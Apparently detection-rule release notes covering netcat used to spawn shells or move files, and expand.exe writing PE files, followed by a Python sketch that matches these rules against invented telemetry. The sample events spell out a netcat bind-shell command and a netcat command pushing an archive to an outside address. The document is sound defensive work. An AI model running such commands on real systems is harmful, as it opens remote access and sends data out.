==================================================

CREATED: ANY-NETCAT-PROC-EXEC (#1221)

Description

Identifies instances of netcat being used to execute or launch another process, such as a shell. This can be used to set up a backdoor or other remote access.

References

ATT&CK Technique T1059 & T1104

==================================================

CREATED: ANY-NETCAT-FILE-TRANSFER (#1222)

Description

Identifies instances of netcat being used to transfer files to another system. This can be used to exfiltrate data, or to stage data in preparation for exfiltration.

References

ATT&CK Technique T1074 & T1105

==================================================

CREATED: WIN-EXPAND-WRITE-PE (#1232)

Description

Identifies expand.exe writing a PE file, since it normally writes only .tmp files. Open-source intelligence also shows that expand.exe can be used to make a WebDAV call to download resources from external sites.

References

ATT&CK Technique T1085 & T1105
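An added example, not the vendor's rule logic or detection engine, showing how the three detections described above could be matched over constructed process-start and file-write telemetry in Python; the Event fields, the netcat option list and the sample events are assumptions.

```python
import re
from dataclasses import dataclass

NETCAT = {"nc", "ncat", "netcat", "nc.exe", "ncat.exe"}
NETCAT_TOKEN = re.compile(r"(?:^|[\s\"'])(?:nc|ncat|netcat)(?:\.exe)?(?=\s|$)")
EXEC_OPT = re.compile(r"(?:^|\s)(?:-e|-c|--exec|--sh-exec)(?:\s|=)")  # assumed option set
REDIRECT = re.compile(r"\s[<>]\s*\S")          # a file redirected onto the socket
PE_EXT = (".exe", ".dll", ".sys", ".scr", ".cpl")

@dataclass
class Event:
    kind: str            # "process" (start) or "file" (write)
    image: str           # basename of the acting process
    cmdline: str = ""    # command line (process events)
    parent: str = ""     # basename of the parent image (process events)
    target: str = ""     # path written (file events)
    magic: bytes = b""   # first bytes of the written file (file events)

def any_netcat_proc_exec(e: Event) -> bool:
    # Netcat launching another process: a child whose parent is netcat, or an
    # exec-style option on netcat's own command line. Lineage is the sturdier signal.
    if e.kind != "process":
        return False
    return e.parent in NETCAT or (e.image in NETCAT and bool(EXEC_OPT.search(e.cmdline)))

def any_netcat_file_transfer(e: Event) -> bool:
    # The shell, not netcat, owns a redirect, so the invoking shell's command line
    # is where "nc ... < file" or "nc ... > file" shows up.
    return e.kind == "process" and bool(NETCAT_TOKEN.search(e.cmdline)) and bool(REDIRECT.search(e.cmdline))

def win_expand_write_pe(e: Event) -> bool:
    # expand.exe normally emits .tmp files; a PE extension or an MZ header is the outlier.
    if e.kind != "file" or e.image.lower() != "expand.exe":
        return False
    return e.target.lower().endswith(PE_EXT) or e.magic[:2] == b"MZ"

RULES = {"ANY-NETCAT-PROC-EXEC": any_netcat_proc_exec,
         "ANY-NETCAT-FILE-TRANSFER": any_netcat_file_transfer,
         "WIN-EXPAND-WRITE-PE": win_expand_write_pe}

def evaluate(events):
    # Return (rule name, event index) for every rule that fires on each event.
    return [(name, i) for i, e in enumerate(events) for name, fn in RULES.items() if fn(e)]

SAMPLE = [  # constructed sample telemetry, not captured data
    Event("process", "sh", cmdline="/bin/sh -i", parent="nc"),                     # 0: child of netcat
    Event("process", "nc", cmdline="nc -l -p 4444 -e /bin/sh"),                   # 1: exec option
    Event("process", "sh", cmdline='sh -c "nc 203.0.113.7 9001 < backup.tgz"'),  # 2: file pushed out
    Event("process", "nc", cmdline="nc mail.example.com 25"),                     # 3: plain connect, no hit
    Event("file", "expand.exe", target=r"C:\Windows\Temp\cab1.tmp", magic=b"\x00\x00"),  # 4: usual .tmp
    Event("file", "expand.exe", target=r"C:\Users\Public\svc.exe", magic=b"MZ\x90\x00"), # 5: PE written
]
```

Running `evaluate(SAMPLE)` fires the first rule on events 0 and 1, the transfer rule on event 2, and the expand.exe rule on event 5 only.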
